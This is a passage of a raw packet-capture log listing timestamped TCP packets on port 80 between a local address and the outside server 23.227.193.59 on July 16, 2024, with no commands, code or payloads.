                                                                            Jul 16, 2024 22:29:50.400624037 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.400640011 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.400655985 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.400666952 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:50.400671959 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.400686979 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.400697947 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:50.400702953 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.400717974 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.400726080 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:50.400734901 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.400749922 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.400762081 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:50.400764942 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.400780916 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.400788069 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:50.400796890 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.400818110 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:50.401124001 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.401139975 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.401154995 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.401169062 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:50.401196957 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:50.401262045 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.401278019 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.401293039 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.401308060 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.401318073 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:50.401321888 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.401335001 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:50.401336908 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.401352882 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.401367903 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.401381016 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.401385069 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:50.401396036 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.401407957 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:50.401415110 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.401429892 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.401439905 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:50.401482105 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:50.484849930 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.484889984 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.484929085 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.484946012 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:50.484981060 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.485014915 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.485034943 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:50.485048056 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.485084057 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.485097885 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:50.485162973 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.485213995 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:50.485213995 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.485246897 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.485280037 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.485291958 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:50.485316038 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.485363007 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:50.485445023 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.485479116 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.485528946 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:50.485544920 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.485579014 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.485624075 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.485627890 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:50.485656977 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.485691071 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.485701084 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:50.485723972 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.485773087 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:50.485863924 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.485898018 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.485932112 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.485941887 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:50.485960960 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.485992908 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.486006021 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:50.486027002 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.486057997 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.486072063 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:50.486090899 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.486125946 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.486141920 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:50.486232996 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.486263037 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.486282110 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:50.486294031 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.486326933 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.486341953 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:50.486360073 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.486393929 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.486407995 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:50.486428022 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.486459017 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.486474037 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:50.486490011 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.486524105 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.486536980 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:50.486723900 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.486752987 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.486768961 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:50.486788034 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.486819983 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.486834049 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:50.486851931 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.486886978 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.486901045 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:50.486920118 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.486955881 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.486963034 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:50.487096071 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.487128973 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.487147093 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:50.487160921 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.487193108 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.487214088 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:50.487226963 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.487258911 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.487273932 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:50.487306118 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.487340927 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.487354040 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:50.487518072 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.487550974 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.487566948 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:50.487585068 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.487617970 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.487633944 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:50.487651110 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.487684011 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.487699032 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:50.487716913 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.487750053 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.487763882 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:50.487785101 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.487817049 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.487829924 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:50.487850904 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.487900019 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:50.488081932 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.488114119 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.488147020 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.488158941 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:50.488179922 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.488213062 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.488226891 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:50.488246918 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.488279104 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.488291979 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:50.488312960 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.488348007 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.488363028 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:50.488384008 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.488430977 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:50.488785028 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.488818884 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.488851070 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.488864899 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:50.488884926 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.488918066 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.488933086 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:50.488949060 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.488981962 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.488997936 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:50.489015102 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.489048958 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.489062071 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:50.489080906 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.489115000 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.489135981 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:50.489146948 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.489180088 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.489207029 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:50.489213943 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.489247084 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.489253044 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:50.489279032 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.489311934 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.489326000 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:50.489347935 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.489398003 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:50.489610910 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.489644051 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.489677906 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.489692926 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:50.489711046 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.489743948 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.489758015 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:50.489774942 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.489806890 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.489826918 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:50.489840031 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.489872932 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.489886045 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:50.489907026 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.489939928 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.489953041 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:50.489970922 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.490004063 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.490020990 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:50.490036011 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.490070105 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.490082979 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:50.490102053 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.490135908 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.490148067 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:50.490166903 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.490211964 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:50.490390062 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.490439892 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.490469933 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.490488052 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:50.490504026 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.490536928 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.490550041 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:50.490571022 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.490602970 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.490618944 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:50.490638018 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.490670919 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.490684032 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:50.540994883 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:50.574285030 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.574371099 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.574417114 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:50.574426889 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.574461937 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.574493885 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.574508905 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:50.574531078 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.574573040 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:50.574582100 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.574634075 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.574666977 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.574682951 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:50.574702978 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.574736118 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.574754000 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:50.574769020 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.574801922 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.574815989 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:50.574841976 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.574889898 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:50.575155973 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.575186014 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.575221062 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.575234890 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:50.575257063 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.575290918 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.575304985 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:50.575324059 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.575359106 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.575376987 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:50.575630903 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.575664997 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.575679064 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:50.575699091 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.575732946 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.575745106 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:50.575767040 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.575799942 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.575814009 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:50.576098919 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.576132059 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.576157093 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:50.576184034 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.576216936 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.576235056 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:50.576251030 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.576282024 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.576294899 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:50.576317072 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.576349974 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.576366901 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:50.576381922 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.576416016 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.576426983 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:50.576451063 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.576498985 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:50.576508045 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.576543093 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.576580048 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.576586008 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:50.576816082 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.576864958 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:50.576894045 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.576927900 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.576961994 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.576977015 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:50.576994896 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.577043056 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:50.577066898 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.577101946 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.577135086 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.577148914 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:50.577169895 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.577214956 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:50.577255964 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.577287912 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.577321053 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.577342033 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:50.577353954 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.577388048 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.577400923 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:50.577421904 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.577454090 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.577470064 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:50.577487946 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.577521086 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.577536106 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:50.577553988 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.577588081 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.577598095 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:50.577620983 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.577652931 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.577666044 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:50.577687979 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.577719927 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.577730894 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:50.577775002 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.577804089 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.577821016 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:50.577836990 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.577868938 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.577896118 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:50.577903986 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.577950001 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:50.577955961 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.578008890 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.578042030 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.578061104 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:50.578074932 CEST804973023.227.193.59192.168.2.4
